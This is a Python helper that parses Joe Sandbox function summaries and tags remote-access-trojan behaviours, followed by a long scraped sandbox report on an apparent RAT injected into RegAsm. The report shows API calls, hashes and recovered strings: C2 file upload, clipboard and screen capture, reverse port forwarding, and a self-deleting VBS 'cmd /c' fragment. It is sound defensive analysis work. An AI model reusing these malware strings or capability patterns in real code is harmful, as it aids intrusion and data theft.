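```python
"""Triage helper for Joe Sandbox function-summary blocks ("APIs" / "Similarity").
Added example; the rules and tag names below are assumptions, not Joe Sandbox signatures."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed sample in the report's own layout (leading whitespace already stripped).
# The last block is cut off after "Strings", as the report page is, so the parser
# must cope with a block that has no Similarity metadata at all.
SAMPLE = """\
APIs
• __aulldiv.LIBCMT ref: 00408D88
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
• ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
• CloseHandle.KERNEL32(00000000), ref: 00408F9F
Strings
Similarity
• API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
• API String ID: 3086580692-2582957567
APIs
• __EH_prolog.LIBCMT ref: 0041A04A
• GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
• Sleep.KERNEL32(000003E8), ref: 0041A18E
• GetLocalTime.KERNEL32(?), ref: 0041A196
Similarity
• API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
• String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
• API String ID: 489098229-1431523004
APIs
  • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
• ExitProcess.KERNEL32 ref: 0040D9FF
Strings
"""

# One API line: optional "Part of subcall function XXXXXXXX: ", then Func.MODULE,
# optional "(args)", then ", ref: XXXXXXXX" (the comma is absent when there are no args).
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<fn>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$"
)
HKCU = "80000001"  # HKEY_CURRENT_USER as it appears in the first RegOpenKeyExA argument


@dataclass
class Call:
    function: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str]  # address of the helper this call lives in, if any


@dataclass
class FunctionSummary:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    api_string_id: Optional[str] = None

    def api_names(self) -> Set[str]:
        # Subcall APIs count: send() in the upload routine is only visible as a subcall.
        return {c.function for c in self.calls}


def parse_blocks(text: str) -> List[FunctionSummary]:
    blocks: List[FunctionSummary] = []
    cur: Optional[FunctionSummary] = None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":                      # each "APIs" header starts a new function
            cur = FunctionSummary()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(Call(m["fn"], m["mod"], args, m["ref"], m["sub"]))
        elif s.startswith("• String ID:"):
            # Strings are "$"-separated; a string may legitimately end in a space
            # ("Uploading file to Controller: "), so only the left side is trimmed.
            raw = line.lstrip()[len("• String ID:"):].lstrip("\t ")
            cur.strings = [x for x in raw.split("$") if x != ""]
        elif s.startswith("• API String ID:"):
            cur.api_string_id = s.split(":", 1)[1].strip()
    return blocks


def tag_behaviours(fs: FunctionSummary) -> List[str]:
    """Map API sets plus corroborating strings to behaviour tags (editor's own rules)."""
    apis = fs.api_names()
    tags: List[str] = []
    if {"ReadFile", "send"} <= apis:        # chunked read-and-send loop: upload primitive
        tag = "file_upload_to_c2"
        if any(x.startswith("Uploading file to Controller") for x in fs.strings):
            tag += " (string-corroborated)"
        tags.append(tag)
    if "GdiplusStartup" in apis and any(re.match(r"^(time|wnd)_%04i", x) for x in fs.strings):
        tags.append("timestamped_screen_capture")
    if {"GetModuleFileNameW", "ShellExecuteW", "ExitProcess"} <= apis:
        tags.append("self_relaunch_then_exit")
    if any(c.function == "RegOpenKeyExA" and c.args and c.args[0] == HKCU for c in fs.calls):
        tags.append("hkcu_registry_read")
    return tags


def triage(text: str) -> List[Dict[str, object]]:
    return [{"api_string_id": fs.api_string_id, "apis": sorted(fs.api_names()),
             "strings": fs.strings, "tags": tag_behaviours(fs)} for fs in parse_blocks(text)]


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row["api_string_id"], row["tags"])
```

The point of tagging on the API set rather than on the Opcode or Instruction fuzzy hash is that the hashes change with every rebuild of the RAT, while the read/seek/send loop and the timestamped capture filenames survive across builds; feed the script the whole function listing and the tagged blocks are the ones worth opening in the disassembler first.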
APIs
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
  • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
  • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
  • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
• ExitProcess.KERNEL32 ref: 0040D9FF
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
• String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• API String ID: 1913171305-3159800282
APIs
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
• SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
• CloseHandle.KERNEL32(?), ref: 00404E4C
• closesocket.WS2_32(000000FF), ref: 00404E5A
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
• CloseHandle.KERNEL32(?), ref: 00404EBF
• CloseHandle.KERNEL32(?), ref: 00404EC4
• SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
• CloseHandle.KERNEL32(?), ref: 00404ED6
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: CloseEventHandle$ObjectSingleWait$closesocket
• String ID:
• API String ID: 3658366068-0
APIs
  • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
• GetLastError.KERNEL32 ref: 00455D6F
• __dosmaperr.LIBCMT ref: 00455D76
• GetFileType.KERNEL32 ref: 00455D82
• GetLastError.KERNEL32 ref: 00455D8C
• __dosmaperr.LIBCMT ref: 00455D95
• CloseHandle.KERNEL32(00000000), ref: 00455DB5
• CloseHandle.KERNEL32(?), ref: 00455EFF
• GetLastError.KERNEL32 ref: 00455F31
• __dosmaperr.LIBCMT ref: 00455F38
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
APIs
• GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
• __alloca_probe_16.LIBCMT ref: 00453F6A
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
• __alloca_probe_16.LIBCMT ref: 00454014
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
• __freea.LIBCMT ref: 00454083
• __freea.LIBCMT ref: 0045408F
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
• String ID: t'`/
• API String ID: 201697637-2084328917
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: _free
• String ID: \&G$\&G$`&G
• API String ID: 269201875-253610517
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: 65535$udp
• API String ID: 0-1267037602
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
• GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
• __dosmaperr.LIBCMT ref: 0043A926
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
• GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
• __dosmaperr.LIBCMT ref: 0043A963
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
• GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
• __dosmaperr.LIBCMT ref: 0043A9B7
• _free.LIBCMT ref: 0043A9C3
• _free.LIBCMT ref: 0043A9CA
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
• String ID:
• API String ID: 2441525078-0
APIs
• SetEvent.KERNEL32(?,?), ref: 004054BF
• GetMessageA.USER32 ref: 0040556F
• TranslateMessage.USER32(?), ref: 0040557E
• DispatchMessageA.USER32(?), ref: 00405589
• HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
• HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage
• API String ID: 2956720200-749203953
APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt$t'`/
• API String ID: 3527080286-1398745098
APIs
  • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
• CloseHandle.KERNEL32(00000000), ref: 00417E20
• DeleteFileA.KERNEL32(00000000), ref: 00417E2F
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
• String ID: 0VG$0VG$<$@$Temp
• API String ID: 1704390241-2575729100
APIs
• OpenClipboard.USER32 ref: 0041697C
• EmptyClipboard.USER32 ref: 0041698A
• CloseClipboard.USER32 ref: 00416990
• OpenClipboard.USER32 ref: 00416997
• GetClipboardData.USER32 ref: 004169A7
• GlobalLock.KERNEL32(00000000), ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
• String ID: !D@
• API String ID: 2172192267-604454484
                                                                                                                                                                                                  • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                                                                                  • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                                                                                  • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                                                                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 100059EA
                                                                                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                  • _free.LIBCMT ref: 100059F6
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A01
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A17
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A22
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A38
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A43
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A51
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                                  • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481B5
                                                                                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481C1
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481CC
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481D7
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481E2
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481ED
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481F8
                                                                                                                                                                                                  • _free.LIBCMT ref: 00448203
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044820E
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044821C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                                                                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                                                                                                                  • _free.LIBCMT ref: 00445515
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044552E
                                                                                                                                                                                                  • _free.LIBCMT ref: 00445560
                                                                                                                                                                                                  • _free.LIBCMT ref: 00445569
                                                                                                                                                                                                  • _free.LIBCMT ref: 00445575
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                  • String ID: C$t'`/
                                                                                                                                                                                                  • API String ID: 1679612858-2642070891
                                                                                                                                                                                                  • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                                                                                                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Eventinet_ntoa
                                                                                                                                                                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                                                                                                                  • API String ID: 3578746661-3604713145
                                                                                                                                                                                                  • Opcode ID: 57d06d6c52dfeba4092ae4aaac0bc016092a07c4d064bf56e84e87d0b32c376f
                                                                                                                                                                                                  • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57d06d6c52dfeba4092ae4aaac0bc016092a07c4d064bf56e84e87d0b32c376f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
APIs
• GetConsoleCP.KERNEL32 ref: 0044B47E
• __fassign.LIBCMT ref: 0044B4F9
• __fassign.LIBCMT ref: 0044B514
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
• WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
• WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
